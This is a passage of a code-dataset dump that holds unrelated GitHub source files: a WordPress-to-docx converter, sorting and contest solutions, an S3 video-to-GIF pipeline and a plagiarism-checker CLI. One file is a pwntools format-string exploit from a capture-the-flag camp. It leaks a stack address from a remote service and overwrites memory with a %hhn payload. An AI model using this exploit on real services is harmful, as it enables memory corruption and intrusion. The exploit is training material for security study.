bitrate)\n","repo_name":"Makintos/plugin.video.acestream.sports","sub_path":"lib/livefootballol.py","file_name":"livefootballol.py","file_ext":"py","file_size_in_byte":14963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"18472402260","text":"from pwn import *\ncontext.log_level = 'DEBUG'\n\ndef p64(n):\n return pack(n, 64, 'little')\n\n# p = process('./secret')\n# gdb.attach(p, gdbscript=('b *0x0000000000400801\\n'))\np = remote('140.110.112.221', 6131)\npayload = b'%10$p' # leak_stack_address\np.recvuntil(b':')\n# buffer locate on offset 8\np.sendline(payload)\nstack_address = int(p.recvuntil(b'\\n').strip(b'\\n').split(b' ')[3].decode(),16)\nstack_address = stack_address - 0x100 + 12\nprint(hex(stack_address))\np.recvuntil(b')')\n# p.sendline(b'N')\n# p.recvuntil(b':')\npayload = b'%%55c%10$hhn' + b'B'*5 + p64(stack_address) # modify stack value b'%55c%10$hhn' + b'B'*5\np.sendline(payload)\n#p.recvuntil(b')')\np.interactive()\n","repo_name":"Stanley137/CyberSecurity_Camp","sub_path":"mythirdpwn_ctf/secret_poc.py","file_name":"secret_poc.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22910229755","text":"import xml.etree.ElementTree as ET\nfrom html.parser import HTMLParser\nfrom docx import Document\nimport datetime\nimport string\nimport requests\nimport pathlib\nimport shutil\nfrom docx.shared import Inches\n\nclass MyHTMLParser(HTMLParser):\n \n def __init__(self, _lastTitle, _lastDate):\n self.doc = Document()\n self.doc.add_heading(_lastTitle, 0)\n self.doc.add_heading(_lastDate, level=1)\n self.imageCounter = 0\n self.imageStack = []\n self.treeStack = []\n super().__init__()\n\n def handle_starttag(self, tag, attrs):\n print(f\"Encountered a start tag:{tag} , {attrs}\")\n if (tag == 'img'):\n for attr in attrs:\n if attr[0] == 'src':\n print(attr[1])\n self.imageCounter = self.imageCounter + 1\n extention = pathlib.Path(attr[1]).suffix\n fileName = './exports/' + str(self.imageCounter) + extention\n print(fileName)\n url = attr[1]\n response = requests.get(url, stream=True)\n with open(fileName, 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response\n #with open(fileName, 'wb') as f:\n # f.write(requests.get(attr[1]).content)\n self.imageStack.append(fileName)\n self.treeStack.append(tag)\n pass\n\n def handle_endtag(self, tag):\n print(\"Encountered an end tag :\", tag)\n tagtype = self.treeStack.pop()\n pass\n\n def handle_data(self, data):\n strippedString = data.translate(str.maketrans('', '', string.whitespace))\n print(f\"Encountered some data :{len(data)}{len(strippedString)}{data}\")\n if (len(strippedString) > 0):\n if (len(self.treeStack)>0):\n tagtype = self.treeStack[len(self.treeStack)-1]\n if (tagtype == 'p'):\n if (len(self.treeStack) > 1):\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if innertagtype == 'blockquote':\n textToWrite = '\\\"' + data + '\\\"'\n self.doc.add_paragraph(textToWrite)\n else:\n self.doc.add_paragraph(data)\n if (tagtype == 'h1'):\n self.doc.add_heading(data, level=1)\n if (tagtype == 'h2'):\n self.doc.add_heading(data, level=2)\n if (tagtype == 'h3'):\n self.doc.add_heading(data, level=3)\n if (tagtype == 'div'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'figure'):\n self.doc.add_paragraph(data)\n if (tagtype == 'a'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'p'):\n self.doc.add_paragraph(data)\n if (tagtype == 'li'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'ul'):\n self.doc.add_paragraph(data, style='List Bullet')\n if (tagtype == 'img'):\n fileName = self.imageStack[len(self.treeStack)-1]\n print(f\"write {fileName} to the doc\")\n self.doc.add_picture(fileName, width=Inches(1.25))\n else:\n self.doc.add_paragraph(data)\n else:\n if (len(self.imageStack)>0):\n fileName = self.imageStack.pop()\n print(f\"write {fileName} to the doc\")\n self.doc.add_picture(fileName, width=Inches(1.25))\n \n def write_document(self, title):\n self.doc.save('./exports/'+title+'.docx')\n\ntree = ET.parse('researchandideasdiary.WordPress.2019-07-15.xml')\nroot = tree.getroot()\nprint(root.tag)\nprint(root.items())\nchannel = root.getchildren()[0]\nlistOfTags = []\nfor child in channel.getchildren():\n print(child.tag, child.attrib)\n if child.tag == 'item':\n lastTitle = ''\n lastDate = ''\n lastGuid = ''\n for postdata in child.getchildren():\n listOfTags.append(postdata.tag)\n if (postdata.tag == 'title'):\n print(postdata.text)\n lastTitle = postdata.text\n if (postdata.tag == 'pubDate'):\n print(postdata.text)\n lastDate = postdata.text\n if (postdata.tag == 'guid'):\n print(postdata.text)\n lastGuid = postdata.text\n if postdata.tag == '{http://purl.org/rss/1.0/modules/content/}encoded':\n datestring = 'draft'\n if (lastDate != 'Mon, 30 Nov -0001 00:00:00 +0000'):\n date_time_obj = datetime.datetime.strptime(lastDate, '%a, %d %b %Y %H:%M:%S %z')\n datestring = str(date_time_obj.date())\n print(datestring)\n parser = MyHTMLParser(lastTitle, datestring)\n parser.feed(str(postdata.text))\n parser.write_document('Exp'+datestring+lastTitle)\n\nlistOfUniqueTags = list(set(listOfTags))\nfor tag in listOfUniqueTags:\n print(tag)\n\n ","repo_name":"JapieGreeff/WordPressToDocx","sub_path":"wordpressInDocxOut.py","file_name":"wordpressInDocxOut.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70121702408","text":"# -*- coding: utf-8 -*-\r\n'''\r\n1. В диапазоне натуральных чисел от 2 до 99 определить, сколько из них кратны\r\nкаждому из чисел в диапазоне от 2 до 9.\r\n'''\r\n\r\nstart_range = 2\r\nend_range = 100\r\n\r\nmultiples_min = 2\r\nmultiples_max = 9 + 1\r\n\r\nfor i in range(multiples_min, multiples_max):\r\n count = 0\r\n for itm in range(start_range, end_range):\r\n if (itm % i) == 0:\r\n count += 1\r\n print(f'Числу {i} в диапазоне от {start_range} до {end_range-1} кратны {count} чисел')","repo_name":"darksoul985/Algorithms","sub_path":"lesson_3_task_1.py","file_name":"lesson_3_task_1.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22865427718","text":"import os.path as osp\nimport unittest\n\nimport cv2\n\nfrom modelscope.hub.snapshot_download import snapshot_download\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines import pipeline\nfrom modelscope.pipelines.base import Pipeline\nfrom modelscope.utils.constant import Tasks\nfrom modelscope.utils.test_utils import test_level\n\n\nclass SkinRetouchingTest(unittest.TestCase):\n\n def setUp(self) -> None:\n self.task = Tasks.skin_retouching\n self.model_id = 'damo/cv_unet_skin-retouching'\n self.test_image = 'data/test/images/skin_retouching.png'\n\n def pipeline_inference(self, pipeline: Pipeline, input_location: str):\n result = pipeline(input_location)\n cv2.imwrite('result_skinretouching.png', result[OutputKeys.OUTPUT_IMG])\n print(f'Output written to {osp.abspath(\"result_skinretouching.png\")}')\n\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\n def test_run_by_direct_model_download(self):\n model_dir = snapshot_download(self.model_id)\n skin_retouching = pipeline(Tasks.skin_retouching, model=model_dir)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\n def test_run_modelhub(self):\n skin_retouching = pipeline(Tasks.skin_retouching, model=self.model_id)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\n def test_run_modelhub_default_model(self):\n skin_retouching = pipeline(Tasks.skin_retouching)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"modelscope/modelscope","sub_path":"tests/pipelines/test_skin_retouching.py","file_name":"test_skin_retouching.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"}
+{"seq_id":"73386389129","text":"import cv2\nimport os\nimport re\nimport tempfile\nimport numpy as np\nfrom datetime import date\nfrom PIL import Image\nimport boto3\nimport json\n\nfrom dotenv import load_dotenv, find_dotenv\n\n_ = load_dotenv(find_dotenv())\n\nAWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n\n\ndef get_video(awssession, today):\n # Download from s3\n s3 = awssession.resource('s3')\n s3_client = awssession.client('s3')\n\n filenames = [\n my_bucket_object.key\n for my_bucket_object in s3.Bucket('bageld-inputs').objects.all()\n ]\n\n videoFile = list(filter(lambda x: today in x, filenames))[0]\n\n player_name = videoFile.split(';')[1].replace('_', ' ')\n tour = videoFile.split(';')[2]\n s3_client.download_file('bageld-inputs', videoFile, videoFile[videoFile.find(';')+1:])\n\n return videoFile[videoFile.find(';')+1:], player_name, tour\n\n\ndef upload_game_params(awssession, player_name, tour):\n s3 = awssession.resource('s3')\n\n params_json = json.dumps(\n {\n 'answerHash': hashAnswer(player_name.upper()),\n 'tour': tour\n }, indent=4)\n\n s3.Bucket('bageld-inputs').put_object(Key='bageld_params.json',\n Body=params_json)\n\n\ndef gen_folders():\n temp_dir = tempfile.TemporaryDirectory()\n\n frames_path = os.path.join(temp_dir.name, \"frames\")\n dilate_path = os.path.join(temp_dir.name,\n \"diff_gray_dilate_frames\") # image 0\n gray_path = os.path.join(temp_dir.name, \"diff_gray_frames\") # image 1\n diff_path = os.path.join(temp_dir.name, \"diff_frames\") # image 2\n\n today = date.today()\n output_path = os.path.join(temp_dir.name, str(today))\n\n os.mkdir(frames_path)\n os.mkdir(dilate_path)\n os.mkdir(gray_path)\n os.mkdir(diff_path)\n os.mkdir(output_path)\n\n return temp_dir, [\n frames_path, dilate_path, gray_path, diff_path, output_path\n ]\n\n\ndef load_video(videoFile, filepath):\n count = 0\n\n cap = cv2.VideoCapture(videoFile) # capturing the video from the given path\n frameRate = cap.get(5) #frame rate - want to bump it up\n x = 1\n\n first_iter = True\n\n while (cap.isOpened()):\n frameId = cap.get(1) #current frame number\n ret, frame = cap.read()\n if (ret != True):\n break\n else:\n filename = f\"{filepath}/frames/frame{str(count).rjust(3, '0')}.jpg\"\n count += 1\n cv2.imwrite(filename, frame)\n # Get average frames\n if first_iter:\n avg = np.float32(frame)\n first_iter = False\n cv2.accumulateWeighted(frame, avg, 0.005)\n background_image = cv2.convertScaleAbs(avg)\n cap.release()\n return background_image\n\n\ndef load_frames(filepath='frames/'):\n col_frames = os.listdir(filepath)\n\n # sort file names\n col_frames.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n # empty list to store the frames\n col_images = []\n\n for i in col_frames:\n # read the frames\n img = cv2.imread(os.path.join(filepath, i))\n # append the frames to the list\n col_images.append(img)\n\n return col_images\n\n\ndef gen_dilated_frames(col_images, background_image, filepath):\n kernel = np.ones((4, 4), np.uint8)\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n gray_diff = cv2.cvtColor(diff_image, cv2.COLOR_BGR2GRAY)\n\n # image thresholding\n ret, thresh = cv2.threshold(gray_diff, 30, 255, cv2.THRESH_BINARY)\n\n # image dilation\n dilated = cv2.dilate(thresh, kernel, iterations=1)\n\n cv2.imwrite(os.path.join(filepath, str(i).rjust(3, '0') + '.png'), dilated)\n\n\ndef gen_gray_frames(col_images, background_image, filepath):\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n gray_diff = cv2.cvtColor(diff_image, cv2.COLOR_BGR2GRAY)\n\n # image thresholding\n ret, thresh = cv2.threshold(gray_diff, 30, 255, cv2.THRESH_BINARY)\n\n cv2.imwrite(os.path.join(filepath, str(i).rjust(3, '0') + '.png'), thresh)\n\n\ndef gen_diff_frames(col_images, background_image, filepath):\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n\n cv2.imwrite(os.path.join(filepath,\n str(i).rjust(3, '0') + '.png'), diff_image)\n\n\ndef write_video(output_file, input_path, fps=60):\n\n frame_array = []\n file_list = [f for f in os.listdir(input_path)]\n\n file_list.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n for i in range(len(file_list)):\n filename = os.path.join(input_path, file_list[i])\n\n #read frames\n img = cv2.imread(filename)\n try:\n height, width, layers = img.shape\n size = (width, height)\n except:\n pass\n\n #inserting the frames into an image array\n frame_array.append(img)\n\n out = cv2.VideoWriter(output_file, cv2.VideoWriter_fourcc(*'DIVX'), fps,\n size)\n\n for i in range(len(frame_array)):\n # writing to a image array\n out.write(frame_array[i])\n\n out.release()\n\n\ndef write_gif(output_file, input_path):\n frame_array = []\n file_list = [f for f in os.listdir(input_path)]\n file_list.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n for i in range(0, len(file_list), 4):\n filename = os.path.join(input_path, file_list[i])\n img = Image.open(filename)\n frame_array.append(img)\n\n frame_array[0].save(output_file,\n format='GIF',\n append_images=frame_array[1:],\n save_all=True,\n duration=0,\n loop=0)\n\n\ndef hashAnswer(inputString):\n hash_value = 1\n if len(inputString) == 0:\n return hash_value\n for x in range(len(inputString)):\n ch = ord(inputString[x])\n hash_value = (hash_value * ch) % 100000000 + 1\n return hash_value\n\n\ndef main(cleanup_temp=True):\n today = str(date.today()).replace('-', '')\n\n session = boto3.Session(aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n s3_client = session.client('s3')\n\n videoFile, player_name, tour = get_video(awssession=session, today=today)\n upload_game_params(awssession=session, player_name=player_name, tour=tour)\n\n temp_dir, output_dirs = gen_folders()\n background = load_video(videoFile, temp_dir.name)\n col_images = load_frames(output_dirs[0])\n\n gen_dilated_frames(col_images, background, output_dirs[1])\n write_gif(\"mystery_0.gif\", output_dirs[1])\n\n gen_gray_frames(col_images, background, output_dirs[2])\n write_gif(\"mystery_1.gif\", output_dirs[2])\n\n gen_diff_frames(col_images, background, output_dirs[3])\n write_gif(\"mystery_2.gif\", output_dirs[3])\n\n write_gif(\"mystery_3.gif\", output_dirs[0])\n\n for i in range(4):\n s3_client.upload_file(f'mystery_{i}.gif', 'bagelio-files',\n f'gifs/mystery_{i}.gif')\n\n # need new function to update the database of old games, and delete yesterday's raw video to save s3 space\n\n if cleanup_temp:\n temp_dir.cleanup()\n else:\n return temp_dir\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"liufran1/bageledio","sub_path":"clean_files.py","file_name":"clean_files.py","file_ext":"py","file_size_in_byte":7319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9845972971","text":"import time\na = []\n\nfor x in range(100):\n with open(\"input.txt\",\"r\") as f:\n r = f.readlines()\n for i in r: \n row = i.split(\" \")\n a += [int(j) for j in row if j !=\"\"]\n\n# with open(\"input.txt\",\"r\") as f:\n# r = f.readlines()\n# for i in r: \n# row = i.split(\" \")\n# a += [int(j) for j in row if j]\n\n\n\n\nMIN_MERGE = 32\ndef calcMinRun(n):\n r = 0\n while n >= MIN_MERGE:\n r |= n & 1\n n >>= 1\n return n + r\n\ndef insertionSort(a, s, d):\n for i in range(s + 1, d + 1):\n j = i\n while j > s and a[j] < a[j - 1]:\n a[j], a[j - 1] = a[j - 1], a[j]\n j -= 1\n \ndef merge(a, l, m, r):\n \n len1, len2 = m - l + 1, r - m\n left, right = [], []\n for i in range(0, len1):\n left.append(a[l + i])\n for i in range(0, len2):\n right.append(a[m + 1 + i])\n \n i, j, k = 0, 0, l\n while i < len1 and j < len2:\n if left[i] <= right[j]:\n a[k] = left[i]\n i += 1\n else:\n a[k] = right[j]\n j += 1\n k += 1\n \n while i < len1:\n a[k] = left[i]\n k += 1\n i += 1\n while j < len2:\n a[k] = right[j]\n k += 1\n j += 1\n \ndef timSort(a):\n n = len(a)\n minRun = calcMinRun(n)\n \n for start in range(0, n, minRun):\n end = min(start + minRun - 1, n - 1)\n insertionSort(a, start, end)\n \n size = minRun\n while size < n:\n \n \n for left in range(0, n, 2 * size):\n \n mid = min(n - 1, left + size - 1)\n right = min((left + 2 * size - 1), (n - 1))\n \n if mid < right:\n merge(a, left, mid, right)\n \n size = 2 * size\n\nstartTime = time.time()\ntimSort(a)\nendTime = time.time()\n\n\nprint(\"Tim sort when n=\",len(a))\nprint(\"Durata executie algoritm:\",endTime-startTime,\" secunde\")","repo_name":"poenaruiulian/sorting_algorithms","sub_path":"8_tim_sort.py","file_name":"8_tim_sort.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43428785895","text":"import sys\nimport math\nimport heapq\nfrom collections import deque\nfp = open('gold_mine_chapter_1_input.txt', 'r')\ntnum = int(fp.readline())\ncase = 1\nf = open(\"c1out.txt\", \"w\")\n\nwhile tnum > 0:\n n = int(fp.readline())\n C = fp.readline().split() \n C = [int(ci) for ci in C]\n max_ans = float('-inf')\n adj = [[] for i in range(n)]\n f.write(\"Case #\"+str(case)+\": \")\n for i in range(n-1):\n ab = fp.readline().split()\n a, b = int(ab[0])-1, int(ab[1])-1\n adj[a].append(b)\n adj[b].append(a)\n \n pathsum = [ 0 for i in range(n)]\n pathsum[0] = C[0]\n L = [ 0 for i in range(n)]\n P = [0 for i in range(n)]\n T = [0 for i in range(n)]\n L[0] = 0\n P[0] = -1\n T[0] = 0\n q = deque([(0, -1, 0)])\n H = 0\n while q:\n node, parent, level = q[0]\n q.popleft()\n for x in adj[node]:\n if x == parent:\n continue\n L[x] = level + 1\n P[x] = node\n pathsum[x] = pathsum[node] + C[x]\n q.append((x, node, level+1)) \n H = max(H, level+1) \n\n if H == 0:\n f.write(str(C[0])+\"\\n\")\n tnum -= 1\n case += 1\n continue\n \n nr = int(math.sqrt(H*1.0)) \n #print nr\n\n def dfs(root, node, parent, nr):\n if L[node] < nr:\n T[node] = root\n elif L[node]%nr == 0:\n T[node] = P[node] \n else:\n T[node] = T[P[node]]\n for x in adj[node]:\n if x == parent:\n continue\n dfs(root, x, node, nr)\n\n def LCA(x, y):\n while T[x] != T[y]:\n if L[x] > L[y]:\n x = T[x] \n else: \n y = T[y]\n while x!= y:\n if L[x] > L[y]:\n x = P[x]\n else:\n y = P[y]\n return x \n\n dfs(0, 0,-1, nr)\n for x in adj[0]:\n max_ans = max(max_ans, pathsum[x])\n for i in range(1, n):\n for j in range(1, n):\n if i == j:\n continue\n if i in adj[j]:\n continue\n if LCA(i, j) == 0:\n max_ans = max(max_ans, pathsum[i] + pathsum[j] - C[0])\n \n for i in range(1, n):\n if i not in adj[0]:\n max_ans = max(max_ans, pathsum[i]) \n \n f.write(str(max_ans)+\"\\n\")\n tnum -= 1\n case += 1\nf.close()\n\n","repo_name":"Shadek07/facebook-hacker-cup","sub_path":"2021/Qualification Round/Goldmine_C1/c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"10585986687","text":"import random as r\n\nguess = ['石头', '剪刀', '布', '石头']\nplayer = input(f'{guess[0:3]}:')\nwhile player != 'Q':\n try:\n if player not in guess:\n raise\n CPU = r.choice(guess[0:3])\n print(f'CPU:{CPU}')\n if player == CPU:\n print('Draw!')\n elif guess[guess.index(player) + 1] == CPU:\n print('Player Win!')\n else:\n print('CPU win!')\n player = input(f'{guess[0:3]}:')\n except:\n player = input(f'输入有误!{guess[0:3]}:')\n","repo_name":"JMbaozi/absorb","sub_path":"program/猜拳.py","file_name":"猜拳.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
+{"seq_id":"10774566449","text":"'''\n문제 설명\n양의 정수 n이 매개변수로 주어질 때, n이 홀수라면 n 이하의 홀수인 모든 양의 정수의 합을 return 하고 n이 짝수라면 n 이하의 짝수인 모든 양의 정수의 제곱의 합을 return 하는 solution 함수를 작성해 주세요.\n\n입출력 예\nn\tresult\n7\t16\n10\t220\n'''\n\ndef solution(n):\n answer = 0\n if n%2 == 1: # oddoreven = \"odd\" if n%2 == 1 else \"even\" 변수 정의해 홀짝 판단 if oddoreven == \"odd\": \n for i in range(1, n+1, 2):\n answer += i\n else:\n for i in range(2, n+1, 2):\n answer += i*i\n return answer\n\n\n\n# 다른 사람 풀이\ndef solution(n):\n if n%2: # n%2 == 1 즉, 홀수 일때 실행\n return sum(range(1,n+1,2))\n return sum([i*i for i in range(2,n+1,2)])\n\n","repo_name":"etesongg/CodingTest-Practice","sub_path":"programmers/Lv. 0/9-4주/홀짝에 따라 다른 값 반환.py","file_name":"홀짝에 따라 다른 값 반환.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2943193565","text":"import speech_recognition as sr\nrecog = sr.Recognizer()\nmic = sr.Microphone()\n\ndef sysListen():\n with mic as source:\n recog.adjust_for_ambient_noise(source)\n audio = recog.listen(source)\n \n # setup response\n response = {\n \"success\" : True,\n \"error\" : None,\n \"transcription\" : None\n }\n\n # use Google API\n try:\n response[\"transcription\"] = recog.recognize_google(audio)\n except sr.RequestError:\n # API was unreachable or unresponsive\n response[\"success\"] = False\n response[\"error\"] = \"API unavailable\"\n except sr.UnknownValueError:\n # speech was unintelligible\n response[\"error\"] = \"Unable to recognize speech\"\n\n return response[\"transcription\"]\n\n","repo_name":"Siddhant-Ray/SlideEZ","sub_path":"appUtils.py","file_name":"appUtils.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"28918250610","text":"\"\"\"\nThis module consist the CLI of the codeplag util and\nnecessary internal classes for it.\n\"\"\"\nimport argparse\nfrom pathlib import Path\nfrom typing import List, Optional\n\nfrom webparsers.types import GitHubContentUrl\n\nfrom codeplag.consts import (\n DEFAULT_GENERAL_REPORT_NAME,\n EXTENSION_CHOICE,\n LANGUAGE_CHOICE,\n MODE_CHOICE,\n REPORTS_EXTENSION_CHOICE,\n UTIL_NAME,\n UTIL_VERSION,\n)\n\n\nclass CheckUniqueStore(argparse.Action):\n \"\"\"Checks that the list of arguments contains no duplicates, then stores\"\"\"\n\n def __call__(\n self,\n _parser: argparse.ArgumentParser,\n namespace: argparse.Namespace,\n values: List[str],\n _option_string: Optional[str] = None,\n ):\n if len(values) > len(set(values)):\n raise argparse.ArgumentError(\n self,\n \"You cannot specify the same value multiple times. \"\n f\"You provided {values}\",\n )\n setattr(namespace, self.dest, values)\n\n\nclass DirPath(Path):\n \"\"\"Path that raising argparse.ArgumentTypeError when parsing CLI\n arguments if directory is not exists.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n path = Path(*args, **kwargs)\n if not path.is_dir():\n raise argparse.ArgumentTypeError(\n f\"Directory '{path}' not found or not a directory.\"\n )\n\n return Path.__new__(Path, *args, **kwargs)\n\n\nclass FilePath(Path):\n \"\"\"Path that raising argparse.ArgumentTypeError when parsing CLI\n arguments if file is not exists.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n path = Path(*args, **kwargs)\n if not path.is_file():\n raise argparse.ArgumentTypeError(f\"File '{path}' not found or not a file.\")\n\n return Path.__new__(Path, *args, **kwargs)\n\n\nclass CodeplagCLI(argparse.ArgumentParser):\n \"\"\"The argument parser of the codeplag util.\"\"\"\n\n def __add_settings_path(self, subparsers: argparse._SubParsersAction) -> None:\n settings = subparsers.add_parser(\n \"settings\",\n help=f\"Modifies and shows static settings of the '{UTIL_NAME}' util.\",\n )\n\n settings_commands = settings.add_subparsers(\n help=f\"Settings commands of the '{UTIL_NAME}' util.\",\n required=True,\n metavar=\"COMMAND\",\n dest=\"settings\",\n )\n\n # settings modify\n settings_modify = settings_commands.add_parser(\n \"modify\",\n help=f\"Manage the '{UTIL_NAME}' util settings.\",\n )\n settings_modify.add_argument(\n \"-env\",\n \"--environment\",\n help=\"Path to the environment file with GitHub access token.\",\n type=FilePath,\n )\n settings_modify.add_argument(\n \"-r\",\n \"--reports\",\n help=\"If defined, then saves reports about suspect works \"\n \"into provided path.\",\n metavar=\"DIRECTORY\",\n type=DirPath,\n )\n settings_modify.add_argument(\n \"-re\",\n \"--reports_extension\",\n help=\"Extension of saved report files.\",\n type=str,\n choices=REPORTS_EXTENSION_CHOICE,\n )\n settings_modify.add_argument(\n \"-sp\",\n \"--show_progress\",\n help=\"Show progress of searching plagiarism.\",\n type=int,\n choices=[0, 1],\n )\n settings_modify.add_argument(\n \"-t\",\n \"--threshold\",\n help=\"Threshold of analyzer which classifies two work as same. \"\n \"If this number is too large, such as 99, \"\n \"then completely matching jobs will be found. \"\n \"Otherwise, if this number is small, such as 50, \"\n \"then all work with minimal similarity will be found.\",\n type=int,\n choices=range(50, 100),\n metavar=\"{50, 51, ..., 99}\",\n )\n settings_modify.add_argument(\n \"-l\",\n \"--language\",\n help=\"The language of help messages, generated reports, errors.\",\n type=str,\n choices=LANGUAGE_CHOICE,\n )\n\n # settings show\n settings_commands.add_parser(\n \"show\",\n help=f\"Show the '{UTIL_NAME}' util settings.\",\n )\n\n def __add_check_path(self, subparsers: argparse._SubParsersAction) -> None:\n check = subparsers.add_parser(\"check\", help=\"Start searching similar works.\")\n check.add_argument(\n \"-d\",\n \"--directories\",\n metavar=\"DIRECTORY\",\n type=DirPath,\n help=\"Absolute or relative path to a local directories with project files.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check.add_argument(\n \"-f\",\n \"--files\",\n metavar=\"FILE\",\n type=FilePath,\n help=\"Absolute or relative path to files on a computer.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check.add_argument(\n \"--mode\",\n help=\"Choose one of the following modes of searching plagiarism. \"\n \"The 'many_to_many' mode may require more free memory.\",\n type=str,\n choices=MODE_CHOICE,\n default=\"many_to_many\",\n )\n check.add_argument(\n \"-pe\",\n \"--path-regexp\",\n # TODO: Check that it used with listed below options\n help=\"A regular expression for filtering checked works by name. \"\n \"Used with options 'directories', 'github-user' and 'github-project-folders'.\",\n type=str,\n )\n\n check_required = check.add_argument_group(\"required options\")\n check_required.add_argument(\n \"-ext\",\n \"--extension\",\n help=\"Extension responsible for the analyzed programming language.\",\n type=str,\n choices=EXTENSION_CHOICE,\n required=True,\n )\n\n check_github = check.add_argument_group(\"GitHub options\")\n check_github.add_argument(\n \"-ab\",\n \"--all-branches\",\n help=\"Searching in all branches.\",\n action=\"store_true\",\n )\n check_github.add_argument(\n \"-re\",\n \"--repo-regexp\",\n type=str,\n help=\"A regular expression to filter searching repositories on GitHub.\",\n )\n check_github.add_argument(\n \"-gf\",\n \"--github-files\",\n metavar=\"GITHUB_FILE\",\n type=GitHubContentUrl,\n help=\"URL to file in a GitHub repository.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check_github.add_argument(\n \"-gu\", \"--github-user\", type=str, help=\"GitHub organisation/user name.\"\n )\n check_github.add_argument(\n \"-gp\",\n \"--github-project-folders\",\n metavar=\"GITHUB_PROJECT_FOLDER\",\n type=GitHubContentUrl,\n help=\"URL to a GitHub project folder.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n\n def __add_report_path(self, subparsers: argparse._SubParsersAction) -> None:\n report = subparsers.add_parser(\n \"report\",\n help=f\"Handling generated by the {UTIL_NAME} reports as creating html \"\n \"report file or show it on console.\",\n )\n\n report_commands = report.add_subparsers(\n help=f\"Report commands of the '{UTIL_NAME}' util.\",\n required=True,\n metavar=\"COMMAND\",\n dest=\"report\",\n )\n\n # report create\n report_create = report_commands.add_parser(\n \"create\",\n help=\"Generate general report from created some time ago report files.\",\n )\n report_create.add_argument(\n \"-p\",\n \"--path\",\n help=\"Path to save generated general report. \"\n \"If it's directory, than creates file in it with \"\n f\"name '{DEFAULT_GENERAL_REPORT_NAME}'.\",\n required=True,\n type=Path,\n )\n\n def __init__(self):\n super(CodeplagCLI, self).__init__(\n prog=UTIL_NAME,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Program help to find similar parts of source \"\n \"codes for the different languages.\",\n )\n self.add_argument(\n \"-v\",\n \"--version\",\n help=\"Print current version number and exit.\",\n action=\"version\",\n version=f\"{UTIL_NAME} {UTIL_VERSION}\",\n )\n self.add_argument(\n \"--verbose\",\n help=\"Show debug messages.\",\n action=\"store_true\",\n )\n\n subparsers = self.add_subparsers(\n help=\"Commands help.\",\n parser_class=argparse.ArgumentParser,\n required=True,\n metavar=\"COMMAND\",\n dest=\"root\",\n )\n\n self.__add_settings_path(subparsers)\n self.__add_check_path(subparsers)\n 